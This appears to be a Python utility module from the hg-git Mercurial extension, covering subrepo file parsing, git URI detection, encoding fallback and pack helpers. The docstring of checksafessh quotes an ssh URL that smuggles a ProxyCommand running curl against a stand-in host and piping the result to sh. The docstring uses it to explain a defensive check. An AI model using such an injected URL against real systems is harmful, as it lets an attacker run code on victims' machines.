1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244
|
"""Compatibility functions for old Mercurial versions and other utility
functions."""
import collections
import contextlib
import functools
import importlib.resources
import re
from dulwich import pack
from dulwich import errors
from dulwich.object_store import PackBasedObjectStore
from mercurial.i18n import _
from mercurial import (
error,
extensions,
phases,
util as hgutil,
pycompat,
wireprotov1peer,
)
gitschemes = (b'git', b'git+ssh', b'git+http', b'git+https')
@contextlib.contextmanager
def abort_push_on_keyerror():
"""raise a rather verbose error on missing commits"""
try:
yield
except KeyError as e:
raise error.Abort(
b'cannot push git commit %s as it is not present locally'
% e.args[0][:12],
hint=(
b'please try pulling first, or as a fallback run git-cleanup '
b'to re-export the missing commits'
),
)
@contextlib.contextmanager
def forcedraftcommits():
"""Context manager that forces new commits to at least draft,
regardless of configuration.
"""
with extensions.wrappedfunction(
phases,
'newcommitphase',
lambda orig, ui: phases.draft,
):
yield
def parse_hgsub(lines):
"""Fills OrderedDict with hgsub file content passed as list of lines"""
# TODO: get rid of this code and rely on mercurial infrastructure
rv = collections.OrderedDict()
for l in lines:
ls = l.strip()
if not ls or ls.startswith(b'#'):
continue
name, value = l.split(b'=', 1)
rv[name.strip()] = value.strip()
return rv
def serialize_hgsub(data):
"""Produces a string from OrderedDict hgsub content"""
return b''.join(b'%s = %s\n' % (n, v) for n, v in data.items())
def parse_hgsubstate(lines):
"""Fills OrderedDict with hgsubtate file content passed as list of lines"""
# TODO: get rid of this code and rely on mercurial infrastructure
rv = collections.OrderedDict()
for l in lines:
ls = l.strip()
if not ls or ls.startswith(b'#'):
continue
value, name = l.split(b' ', 1)
rv[name.strip()] = value.strip()
return rv
def serialize_hgsubstate(data):
"""Produces a string from OrderedDict hgsubstate content"""
return b''.join(b'%s %s\n' % (data[n], n) for n in sorted(data))
def transform_notgit(f):
'''use as a decorator around functions that call into dulwich'''
def inner(*args, **kwargs):
try:
return f(*args, **kwargs)
except errors.NotGitRepository:
raise error.Abort(b'not a git repository')
return inner
def isgitsshuri(uri):
"""Method that returns True if a uri looks like git-style uri
Tests:
>>> print(isgitsshuri(b'http://fqdn.com/hg'))
False
>>> print(isgitsshuri(b'http://fqdn.com/test.git'))
False
>>> print(isgitsshuri(b'git@github.com:user/repo.git'))
True
>>> print(isgitsshuri(b'github-123.com:user/repo.git'))
True
>>> print(isgitsshuri(b'git@127.0.0.1:repo.git'))
True
>>> print(isgitsshuri(b'git@[2001:db8::1]:repository.git'))
True
"""
for scheme in gitschemes:
if uri.startswith(b'%s://' % scheme):
return False
if uri.startswith(b'http:') or uri.startswith(b'https:'):
return False
m = re.match(br'(?:.+@)*([\[]?[\w\d\.\:\-]+[\]]?):(.*)', uri)
if m:
# here we're being fairly conservative about what we consider to be git
# urls
giturl, repopath = m.groups()
# definitely a git repo
if len(giturl) > 1 and repopath.endswith(b'.git'):
return True
# use a simple regex to check if it is a fqdn regex
fqdn_re = (
br'(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{1,63}'
br'(?<!-)\.)+[a-zA-Z]{2,63}$)'
)
if re.match(fqdn_re, giturl):
return True
return False
def checksafessh(host):
"""check if a hostname is a potentially unsafe ssh exploit (SEC)
This is a sanity check for ssh urls. ssh will parse the first item as
an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
Let's prevent these potentially exploited urls entirely and warn the
user.
Raises an error.Abort when the url is unsafe.
"""
host = hgutil.urlreq.unquote(host)
if host.startswith(b'-'):
raise error.Abort(_(b"potentially unsafe hostname: '%s'") % (host,))
def decode_guess(string, encoding):
# text is not valid utf-8, try to make sense of it
if encoding:
try:
return string.decode(pycompat.sysstr(encoding)).encode('utf-8')
except UnicodeDecodeError:
pass
try:
return string.decode('latin-1').encode('utf-8')
except UnicodeDecodeError:
return string.decode('ascii', 'replace').encode('utf-8')
# Stolen from hgsubversion
def swap_out_encoding(new_encoding=b'UTF-8'):
try:
from mercurial import encoding
old = encoding.encoding
encoding.encoding = new_encoding
except (AttributeError, ImportError):
old = hgutil._encoding
hgutil._encoding = new_encoding
return old
def ref_exists(ref: bytes, container):
"""Check whether the given ref is contained by the given container.
Unlike Dulwich, this handles underlying OS errors for a disk refs container.
"""
try:
return ref in container
except OSError:
return False
def get_package_resource(path):
"""get the given hg-git resource as a binary string"""
components = (__package__, *path.split('/'))
package = '.'.join(components[:-1])
name = components[-1]
if hasattr(importlib.resources, 'files'):
# added in 3.11; the old one now triggers a deprecation warning
return importlib.resources.files(package).joinpath(name).read_bytes()
else:
return importlib.resources.read_binary(package, name)
@contextlib.contextmanager
def add_pack(object_store: PackBasedObjectStore):
"""Wrapper for ``object_store.add_pack()`` that's a context manager"""
f, commit, abort = object_store.add_pack()
try:
yield f
commit()
except Exception:
abort()
raise
def makebatchable(fn):
@functools.wraps(fn)
@wireprotov1peer.batchable
def wrapper(*args, **kwargs):
return None, lambda v: fn(*args, **kwargs)
return wrapper
def create_delta(base_buf, target_buf):
delta = pack.create_delta(base_buf, target_buf)
if not isinstance(delta, bytes):
delta = b''.join(delta)
return delta
|